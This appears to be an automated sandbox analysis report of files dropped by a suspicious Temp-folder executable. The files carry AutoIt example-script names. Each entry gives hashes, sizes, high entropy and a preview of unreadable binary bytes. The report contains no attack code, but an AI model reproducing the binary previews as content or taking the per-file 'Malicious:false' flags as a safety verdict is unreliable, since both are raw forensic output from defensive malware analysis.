                                                                                                                                                                                                                                                Preview:%..m.....&*.."..)..b..e]3_K....w.>...l..|J/....D..)....\g.....L..Z..u....:>Qw.,F..5..`....z$..e.&.G_.w......8..?b....k...C.......M8...WYWv...k...F.D....,..N...X..r%...A...~....u.yW...O.......^.X.]......|F..#...U....."...$....t.).T....ww...}m........;...Q....74.....V.r...XV..)*.&..i...!.$l..Z^...+.?^..kW.$..G......=.H U,.E.;.p\.+w..7J...\..,.+.+.x$.....E..........$..Q"7.|..R.v.O......@H.....,.."I...J2......(..V^.c..\. ..;_F;.@^..J..>&..>....?....r\.'.R.}.....y......!.jT..-.3O....mH...8.3.m....."Q.....9'..P.v.g\.13..E.5..|....ZZQ?X.H...LL..X..ENk....Q...........Z...:.qF...G.....^`...._.c)+t|."."..a..F.......DJd.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Date_Time_GetTimeZoneInformation.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2956
                                                                                                                                                                                                                                                Entropy (8bit):7.933244159816296
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:HV+maUDJ/+PECzUECl2fPDPphjxmCUX1ZX1E8H34o0jZtwp/d:DaU1SUECl2fPbvjxmCyZXu8HUlepV
                                                                                                                                                                                                                                                MD5:94770958F21073E05412C18511741258
                                                                                                                                                                                                                                                SHA1:799F93DA98745E87E8F33FDA471A7CEAA6EF9C55
                                                                                                                                                                                                                                                SHA-256:549D106F2C6464B23BF4083AFECE09A9739B081D3716ADC7D3C9ACA35DAF21A7
                                                                                                                                                                                                                                                SHA-512:255FD35314962A7F6DE9C506CD43B494CDC704A2C3150881FA55E26B23ED5280FEF44EB51116890B3FC8052098DB129BF401E1912948E5C8FC7074FB9DD7BFEA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:}w.>m.h.'sC...?.R.~.2t......4.Xg.H........nB.F..1^.;X./.3.$.X.4.u0........`o...X..8....C..9.k....1J.....[:............[}.x.]....`@....1y...... ....0.y4.8z2..H.4N..q..om...B......l...T.....D...s..a..] ...u..9.z.....;.0My...e.O.??.v.Y.N..*..$VBvLI.DX..9.c..c...!V.p.{. ..9..F%.4...:.h.....r.1..?7.K.B.!.\...t_....[.@../s>..".5/D.|.+.N.O..;k<e:.....zw^*.".aN..y.....2<.w..j....O...k.l.U.....u.~,U...3.3.:....N.`s...qw....a:.(a.....r.z.W2..b. #9c7...}*-..M..q..2....ov.....@.=.`.I....%...~UXb.......). "A5....[...P..4...T.....b...;..'......B.w..j..VYzwN....$....Y......f..~.....cA..cSQ."...?.hM..y"..t...t.l..^.B.7..I..!5U.y.....1A..M..x..d(..l.0.<;...@q......j....5v......k..S.>.H.Qg....}I.~.........*jVg.(.._.........7...._A"$..*.-..T.L.. ..!.Gm..C%".l..x.tXJ...k...*,.J...n..)...6J1 ..5..e.9.~2.,....../.d.+.>Yez-.#B.I..3q..7.y..M..&.......Xr...-[..M.q\B.....QHy.....H.;.E..U.kPX......|.S.a.YN4$A...sW."..u........r.O.g...f ...6C..>.d..r..L&.\.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Date_Time_LocalFileTimeToFileTime.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1434
                                                                                                                                                                                                                                                Entropy (8bit):7.859564621476386
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:F/xa9VSEZH6MtzYaa7rUA1RIZz29qRtcMb/8KWrBWTjmJrc0YXUZtwsTII:F/kvHtzYa2rUA0zaqRn/yw4o0jZtwY
                                                                                                                                                                                                                                                MD5:FEDAB998714BC212458057250A452867
                                                                                                                                                                                                                                                SHA1:696E3D5E41FA343AB0C7FF0D6782DCF6E215ED9A
                                                                                                                                                                                                                                                SHA-256:59967B9DB3EA9B32185BEAF56D4CDD68F8AF77C9072DA920E51C03306FD7CC30
                                                                                                                                                                                                                                                SHA-512:6A26E1F669AEF4AE700A59F6C2F63A6C510A5D756DEEF17E595FFA7D1D4A39EC1561D8B51D86A24403D13460F52E044BC8188CE9601717F7A9EC5CE5328A6F98
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.....p.-.!...K.R$....X....G.f...>..SQ..`@G".F.3Q]...Vb.x<X s.JG...U..>...,.7.....$U.&.OPP_.&.OUA..SrI1.Z....c\..a.....D.^.*.T..I.H.. .$..O..doOS...&.bH.zg...Op..@...E.I.H.K....(.n.._).Wehz...............T>....00.....K../.@.,Kl=..th.j(..er...<..*.g,.....f7/...Zs....^........Z.LX.P..H....2.r9.......K..4......-......}..*~.NW.9...b..........J+Ddl.F\...../....6X.!S.....)..o.h.cF. ....W..{O..J.b....r...'..zr3..../c...)..<6...b<.....!wUq..k.....k.m.'.4...aq.....o.7...=.R...5.....2#.P..._.J..Xj[.......p...9z3..t.{..<w...1.J...g....p...K>b=d...._-.Kso.l..F..&.R...... .5R3.X..9.v?.d..?Y.P5.5,.~.:#.F.@..8.NK..-..E...{4.T..|z..^.Ct.n+E....:^_....{.........~.2.....a1...,..X..;...Q.}&L..K...H.".iGL...X..X..A...j\RW...s... H.3.O%.'g.).p.yyf....g.e......R.~..V.V.Fx..Uz._.0?B...h2..\C.;q37+....../{.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Date_Time_SetFileTime.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2074
                                                                                                                                                                                                                                                Entropy (8bit):7.897810093694751
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:XUmhliWL+a/axJ1I7cUvD2u5RKTEADPmIKHDkWFcmxO4o0jZtw9c:ESPLmxrIhrirPmIJ1mtlei
                                                                                                                                                                                                                                                MD5:DD641571ADE45B1FFA90C0218C7B89BA
                                                                                                                                                                                                                                                SHA1:22102407198970EF51A46BF48A732CFDE9BAE3C0
                                                                                                                                                                                                                                                SHA-256:D3348436E6D56C0539460EE41B35558478E76E7C2E2C2F68981C296973871322
                                                                                                                                                                                                                                                SHA-512:D7881742A1BDC9433EC9593B74F744363F3EB768ED9524989382F4E1E0F7487405A017E028733F7652DE4FB1A292F15712855E184726F6E0B811DCC34E8E4106
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:i..":."...3.k....p..........f...(...S.T.\......tT....o.:.n.+...."H..T.[...]P.M _.f2.kTZ.W...UN.Z.'....v..........c.1........L...........'..D.9L;#..z! j.:.1+.:. ..../-}.0....(.Ee.h..../..nA.V.+.6....g[.....@.K_Kh.I9.Z..W[...e..o.........oebL...{t..A.....Q.....-{H7.?ZM...U.\]U......#..:...t..n.Tf.Z..1.G.......Ab.....H)X.>#.~.cF.W..s........6.^.....%........Sq...o.<.{w.'.....xi.e8...A4..h..j$D.E..!...%e.....R....Q.c..j...(...$f.nLq..b.....`)V...%.....U....r3..HE...*2W.S2_.P:..i..H.j..c...7..B..K.}..:...6|0..}..........Ct..4..... .......hj.t.S]!. W...\..$.<96...Jz6......aL..>w.F..SS.r..F..L....G........Z.n.l....C.....G.4h.>><..&.......-.^7...,.O..2...o.;.x..adU'..:....>...-Z.z.TOI#....|..k..%.... .l.L...^.......8D.L]"..hP..D.C.?C7....t..AX%...2.<S).^..}7..l.oc....]:6..r.....Mv.O2.L.x....P.~....."*L.L?Qdz.....i7.6a..3.5...ms#...S.my..m...M/. O...b...3N2.[,..D..O..R....b@..}........e...\.'T...9.....3... ..6...C..m.5..7..2...d"O.......DwyH.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Date_Time_SystemTimeToArray.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1665
                                                                                                                                                                                                                                                Entropy (8bit):7.865930001806151
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:6fDMFnQjMIht0F42mCUJhaaJ3A+4GGWW37p/weBOcg+I39jmJrc0YXUZtwsTZlq:9JQJGWkUJYwA+4G9WLp4f14o0jZtw5
                                                                                                                                                                                                                                                MD5:5385EFE5985DF6A6669ED09693C4B151
                                                                                                                                                                                                                                                SHA1:C58152CDB4A14106CDB000EA5BB2C439F3753161
                                                                                                                                                                                                                                                SHA-256:EF3E8FC945435E08BD0F788EC6206F9DB58E87479FB0896596697BDDB374D145
                                                                                                                                                                                                                                                SHA-512:7C60E78CA98A1F2C4409469F494BB9206E50B5C46DE43CE9842CC5BFDE8F32B707B6E576883DB46FE10BEFD52B70A984E05B15CC5D41ED8809A89C2D55B6CC7B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:hy....xS.s..*]..5...6).........4.l.v}]K...I..%}....'.t.D.o#..i......b.L......A-....=}h.C..!.5.&IVgG.......`.l7.6J+.....=.1...+.I.^.8v].Kt.(.;iT.q...-.-j..9.$a.....H..c.\.v.X...$K..2...C..#;..~.Ad.Aw.y.....g".j.......)qx....T.O.:....q..`U.%....{.+O....f.[...Q.wQb.E...qT...t0.L..j.v.CA..>.7y..|..Z.....{..}.....m...3..am!..K..v....(., ..H1D..n.D.+.n.8.!xv.p..w.j.......3...6*..U.....>^...P.CT.[..b.eD,.#....c2..vb.8oL....".Dq%.7..L...4.'.....n..hLs....p;@Gm....O.$Y....cST..[.R..q..d.Jgh.<=..y[GqG<3>C....e...m.3.7V0.Z.W.Am.!....x4s.3.z>....c.;..C..../i.<..l5..W}G^z%.g.u....~}.......99.......+...N....6.I.>..D`......4...`....iT..LHN:.4...N...J....Z./.h.....+..H...T..H..[..;......r[W9.....0...].4}..o..%..h..k)Qz3."1...........(>S..x\v..-...E......E....p..Q.U.l..[pY..d7][S..^.U@.....R..."z)2L.x..e.....R...m.....h....=G...N~#..8.e..'?v%..f....k...s....>.T.7....f..sV..M......G4.[.M..3..W?.W3...YR..ai..]wO.y.=Ee........U.j%.J..k....K.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Date_Time_SystemTimeToDateStr.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1420
                                                                                                                                                                                                                                                Entropy (8bit):7.846202456369411
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:PAr+vYmBA2JZQl4w8AAY/MUP2e+iN5Teu2jmJrc0YXUZtwsT4NbRp:g+vYmFZcJpUc2WN1ef4o0jZtw9Rp
                                                                                                                                                                                                                                                MD5:01358AC4DA128C13FD5ACA66BB32CBCE
                                                                                                                                                                                                                                                SHA1:9396ED24B09F30B68191EC2639A7A5DBD385DC53
                                                                                                                                                                                                                                                SHA-256:0AB7C0116C7E995D1DCA3DCAD47A5B5D56764EAB1947721E5151A9A5E33FB951
                                                                                                                                                                                                                                                SHA-512:070A97B9A2DB793EC9EF431E8A567ABC64D3D320CCA08B0BFD44FC85228DDBDD6E649D70837170EFEC082099327E6B135DB3DF0E836C2C71FD6BCE37451FA6ED
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.D..E]1..s.+be..F.s..,.......W+~\...B,..GP. )...7U..v......}.`e.F..4.:oh.....q..Dd.k.r.k.....R.........s...^....HR.nn..)...26..\.8D......:J|......"...e..qs..\....D.1kV.,..(.h.f......C...1.f.....T.... {.%.#...@.O.~X.....D^.vd.a..@......b...L..>.8k..n.&M.)]...idD...m..;.y...3.b.=.1....CP..|.>./Y.=...c..hw<]...R.o.D. ....f.....n......1F.o.....|......*zx?.r.(.[.i_..dV....Z.N .!.{. o*...3............?4...ao.....I.54.,....M.X...G.&..~[}Y9..\.b....6]o..wa..'....?..aO.z. 6....7.....B......!.2..V..i.f....o.Y.r`.%...lvlXW.....]..s...W..?z.-.......~....m{D....9..oN"K.4a.....?..7}..B..W..jH.a.....8^.1.D...r..%).S.[.F.-.r/dF."5..,..S.y}..b..O:...5.6..~t.,.G.q.!.s...}..sE,....&..h.....3...@..o..@..(...l.F.0.'O...i....!i.P.TAi.....kk.........O...g.....t...G..*.A..2:l......a.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Date_Time_SystemTimeToDateTimeStr.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1883
                                                                                                                                                                                                                                                Entropy (8bit):7.875423817000578
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:fa3dd3gE6YB5YpHPakMXQwdfKTCAWxzG4o0jZtwb:Sdd3Z65PHMRKrWxzbleb
                                                                                                                                                                                                                                                MD5:1FF9298000663BC502B36A4A855350FB
                                                                                                                                                                                                                                                SHA1:EFC2CDB6A2344E4D7D65AA30AC13E34512C62665
                                                                                                                                                                                                                                                SHA-256:F6067920A164DFBBAE3AFEF98F8C398A1CFC53A88EA498D5C4CE98EB07674E1B
                                                                                                                                                                                                                                                SHA-512:D33935043881A443C0FE7036CF67AF6E5E53D8C30884ABBAB41375BF716BB28C9427D8AEA04352CC60EB6E05100D61028884FC3D6B16336CBF890576A6113BC3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.n.....!.`....5......;gfQ...9:.r...gA<.E.7.A.W.......6.E....^.Z......'.S.Y...'5E.....d}..x...K....vG...L.LWT.......#)j.{.v.._.....&.F.@..1xc:6t;j`..{...<...v..N.6..g.1..E-.*P..#E.......P.s..v...|....7.....-u.W..<.1?.Vr..u.J3bU.aX2...K%.O..%...V...e%<(J~1...x.t...'.n)#O.~.[......../.;....)P)......)ji....yu...Q.^2"...w.C.L...[a._ya.EQ.H..I.(.#.h,$.d.=..$...B0...w{j.G..F ...XXK..:,R...u.L...&%......Zj..+.^.*.wh..^..4]_>W..U..j.Y..cAw6..p<.2SQ.0p..!.3#.;.qul.....G_Ie}......<[.v..9..SQ~6.........._...g..F?go.]E.w... B.X9...?..*xL./...b..:.D..6.c$.g..Zf..^...\?..=.x.)..v.?.D@\(wr..F..P...F.G..W'...|\......Vdz.v.?.2.".......d...h....v...>.....G9..q...0.NYf...X..*uwh..{Kjfe^..s.I..! ..3,...2v.'C..]...w........Y5......;4.+..#8.R.o.r.Vu..s...|.......[.K.c.^..-.Fd......p*...1.;..U...\8s.a.$...L...H.h......K.....A...KVt.'.~H.&o=......{.f3l.......{5...;P..>[....C(9.....BdP ....\h...:...........6!{#K.C..]+.1\I^.NW.....-.pv.Y..+....C]?v.>Dxu7h.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_GUICtrlButton_GetIdealSize.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1771
                                                                                                                                                                                                                                                Entropy (8bit):7.886330996519955
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:lfzVMa05CGt6xEJhNZCfY4OnlIdXr4o0jZtwC:1xp05CGaEHPYXwleC
                                                                                                                                                                                                                                                MD5:99BF501821CC6EC22A48B6297775ACAD
                                                                                                                                                                                                                                                SHA1:64721EA5C7D3537B80C8DBB395CEAF7F579FBF2E
                                                                                                                                                                                                                                                SHA-256:C32901AB49BDDB679F378201A5FEB0F49D8076D45A6EA923CF5AF36D022BFF9D
                                                                                                                                                                                                                                                SHA-512:D06825FA40387E28F034F69D770D5807A7134B22BF99B9847A0BF19B1DCE260373081F444E428BF772EC89C30E7CE2711BE9FC8559C4B099D9B681CD33649B9D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.S>.]%.).B$.*.....~...u..}O.......'..P..T^..<r.v.-o^.#.....8w7v.]fTu.4.4(..$.q.M.._...GU}.Y...rpR..zi(.T.PA..k1!q....L.....vW6.D^.3*."..Z..H.T...Y...)#..|yV..{e.b......:..z6..C.j.D.......;.."P..-........z.6..-5.L.c...X..e w.....Hv.6..-.-. ......w.|.G5....@....d..Cc.'.^.+...[^h.....&.`.....5.,).t..*.....&|..`.1.zy..i.9....&+.P}.F........)..V.6.....R?..aw.......X...z.#.{4>.q....4&i...AT..../Q..r...0.....s.X."..M...... ..#...m}W."....K..|....+#.~..o?..@.A..Z......}.ZY^....I'S.....#.-.l...y....X#c).......'Tw...j........l..]...."W..........,./...`.I'.X... .I$u....3s.d.....I...+....}e..dG..(.gf.......>=...F4B.y.pu>......9x.}..E7J"~t0.E.}\.[....@....^$.........I.r..V..Afxo........+..Zn.b..d..g..4@.{.e.._.P*...ec.:.,.9/.`.:.L..s..B.=..+.(.8.........}....&>*2....AT.S..Vh.[;:.6._......< pWI.$[...UQ...Pg].)..k..............}..<.....SK7Z7...:S..C..U%~.....3.H.+[.3.o.G...Y>!e..X.Ue...S...QZ#@..r)..~.s.....Y.n.@.2.8VR.>_........(...Z).K&..D..#.m.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_GUICtrlButton_GetImageList.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3310
                                                                                                                                                                                                                                                Entropy (8bit):7.940540529215713
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:hyMT5LBIzymZRPeWlmChZDv8Ql/wQv/hNl7uL0qTleV:hyM1GWQd5zDhbNl7QTUV
                                                                                                                                                                                                                                                MD5:A1BA03EDE642708953F9A62AF03F85AD
                                                                                                                                                                                                                                                SHA1:B10262E09B6413B28181084F5653CFDF66F06A76
                                                                                                                                                                                                                                                SHA-256:121D8DF1BC1DA41D6BCAD19EBCFD79DFE47C00C9522B1E126328E4B19AFFAF81
                                                                                                                                                                                                                                                SHA-512:741222A720BCBCCDD3E8127C0608646FF804A770FD181B5C8DEA07E7EF9CE481FA680B0C6EF48D433BB5D3057C10CDCAECC1E3D898A455906910F5AB87FF33C3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:>..B.9.[..%.:..E....74.z..bX......@\.S.a..N.u...pi.r.w|V.........Z............[....J...qd.Y......h./&x.^.U...+B..n..2-..kL.HBa.{..>\y_..q.aw!~......$..+3.p...+6.."[in_!*.^.Rf.3....y.A..Q\.h1..`DD.`.].b....@#...,w...\1S.|......XapO......t.R.......].....=M.%.u..".w...).....%......Z.3.O..o..{.A...+.Z..P.V.jw.. ...\...i...Q@..Y..K.../.%O4.t.ZF..X....=......^o.i .1.......+.....[_W.]\..mT..V.q. R....P.;j...9..7..-..v.P....;.<......DI.?L.C.}J.\l....6x....0.o[d3.&.."....,E......qJz72L.......<.[m....\.J'...x2..N8...H|..@/....8 A.......TF.$..<0Ws....;.nu.2....J...m{\..Tz.pT.p..Os...6....x..pXg5U.DF.......q..z/..^' .\..~.q...EY..C...._...........e..].\H.JW..!.f.-...X7>.q.....p...C6.....C..fG..<..b-......q..)..R..54(..7b...=1..R4...$.Jbe..."4.=......?...\..k..o4..K..E!..3lD._....'..~V.h....O....(.%.~.s.ME.....JK.U.>}.05iP]>.2X.G..Vx,.....x...y.@8v.....z%.:}75.zi.z.oZ......X..r...3.._{u..2.'.FZ.`...d.m.O......{.."...s.Qu.I.-....8...C..K....~

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_GUICtrlButton_GetImageList[2].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2767
                                                                                                                                                                                                                                                Entropy (8bit):7.927028280141313
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:xWm2Qg5Bkdq6uupK0/b9WxgaYsfezKjr7SWA9MXOOi9weUElI4o0jZtwWk:xWm2ft6BpK0j2lYsf5WWA9SOOiEEblep
                                                                                                                                                                                                                                                MD5:BF4B140716125942EDA1F960584874C4
                                                                                                                                                                                                                                                SHA1:FC199EE7BDE6B1F590AD202F07A4529062EDED63
                                                                                                                                                                                                                                                SHA-256:625615C434505F4126997D7D8F310ACED5ACBC356D01B5FF8E3DDC7BBE3618D2
                                                                                                                                                                                                                                                SHA-512:FF0AE409AC0D42FF4717E2ACB8F1C8CD8C4D60D4E99952AB07274CE914A587A75728164673C46F0D405BDB842580993848C89A8F02EDAA0D7440C7C5D83B4430
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...!..+...e..*.~.q.[......[:&........{@i.V..u...;LT$o...p{?...E....cP~%...`w..x..D..w....=.?....w(.. a..8D .......?*...=.....jzigt....a,..K..].<=...,.e.D(..5>&o....z.....Ie..s.6&.#.c....E/..+.pW%....}.c.j.?...K./......mi.{.-."....6..jo{.0.4..c.!A..........n.C..a<.'1.!#..j..$k...I...|......N.~)..o^:.....c.....[w._..T1.......M.m(.m.H..y'.....M?.;.n......A...X.s.]u.A.2.P.....5p.e...........k..498.....j78..b.....>.e.(a.sv3UF.I.<..9.(}c..f.Gs."w.E.q~_{...T......#r..KDQ....M..~....4...sJ..c$...]..|`...TN.;..2......$6X.....n......_..\qc........."GS.......K~S..Kv...w8..u.Bd.2..P<..H...?[.^F.h........\`*M..S8.p..3.Cl'..."9.............w..\..i.Q.v;..j..~2......D.N../G....=d.X..t../$%t...>.g.M...=.........7r...8Y..9...6P.......A..}.G..m....T... .M^..&.......I~.0...d.$...o... I....C..V..k.j..'l.M|..K..:...e..PBv...vK,U*..c.q..9U.?..p.<->....$fE..c.G.2Z..J".W..p..U..l?..}7.d3..h.*.....q.~W..C6...2.S.....%..P..}.O.N8...Q.rw-o....#~....Z./......9q.I...b.v.K.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_GUICtrlButton_GetNote.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1704
                                                                                                                                                                                                                                                Entropy (8bit):7.87425369213054
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:ntTpY10PieEEPDI1g3+gMTchpcA2Cw4o0jZtwhT:nDA0/hPM1HTcfcT6le1
                                                                                                                                                                                                                                                MD5:E28DBF8E1358FF1332DC13A6581E83F9
                                                                                                                                                                                                                                                SHA1:631E1DD8883F1D7A30BAB3FEE06809A5A20E508D
                                                                                                                                                                                                                                                SHA-256:8358EAD5FDACE6D767E401D8104017DF1A6345E1C973DFF0207DEE441A4F6AF1
                                                                                                                                                                                                                                                SHA-512:19462E099A6CF85FF38AB5C96BC05890E87DD48FEEF5151C1D6B5171665B6E6899A3718E2DDC0C91923B160F5858A8417C2B53D0885028F290487C5CD6F396BA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:~/.X.m..|....0..8,.M....q.6...(.2.C....{..4.,f.t.B.(0...V.PL...j.E{...U.T"..E...5J...ef..K...8Mt|.Y....&DS...g.m.\.J..*..M.?j..G..H..9G..?|...,.m.1.....m.7]...-=.....!.aYa$....E.`&<%..*.2........:.....rY.......w.t.AQ.k.j..Z....,...W..wh.@....=....U]`.....%Cc...1...o_..W..s....er...Z...:E.y.b..nt.i..LN.....r..>m.[|.O....o.T....#U..j"6.*=...hY...Ysz."..,...?.....~.#'....m"...+;5.j..n9...%x.....J....q...>k..#..V.;..;.K.F....U.yx..&"...O.XO./....&.e....{YpJ.>s..I...*E..3>H._fr.q.(L".7...{....)1e...u.....8s..T.ra;...KTeH...*0...4...A.]Sc7x)v.5q....m2.k>We..-.0..*.2.7uL.q{K..k....0.......C#..G."\&xF.*..Qj.....:r..V.jt..1...Xx.g&...E...a..Z.U.f$.9s..H.s..f.$wY.H%@.....(....W.J.m^.*T?..&..o.3.`.....lJ.s$.|....SUr.^.....p...%..aw.87..c.....q..\....'1..k.#25...f.bz..(p....$it.5......~B.....:.."...._$.....^..!7;.nU.6.... .&.....Hg`|KH..5..p\j".z.R.N......#F...|..z..'.`..j.F'....E.O..:s.D..r<F3T....6.2.......-d.(k......~4@.Y.....T9..S~f..4.L...A._.e...

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_GUICtrlButton_GetNoteLength.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1670
                                                                                                                                                                                                                                                Entropy (8bit):7.88072726786892
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:P/x5I8mDMxKLEB2o0t3u8VeFGo5tp4J4o0jZtwaTpf:P/x5I8ZKyx0d7sGGtp4KleaT5
                                                                                                                                                                                                                                                MD5:AEB333388387545352B253F70A69626E
                                                                                                                                                                                                                                                SHA1:DF925F4731660E2F6E483821A01AF213249C7013
                                                                                                                                                                                                                                                SHA-256:A42F59A9C11359415ECC119722A04797475A5C8167286F2A41F327A62B01E655
                                                                                                                                                                                                                                                SHA-512:D048557EFE3CC81E0C43A90929DC570F6E408E861DF51F42E3B7FF4743921C97594D563919A4DA2D095116449B7884887A9EB59185E6A575EC5A45DD055DB521
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
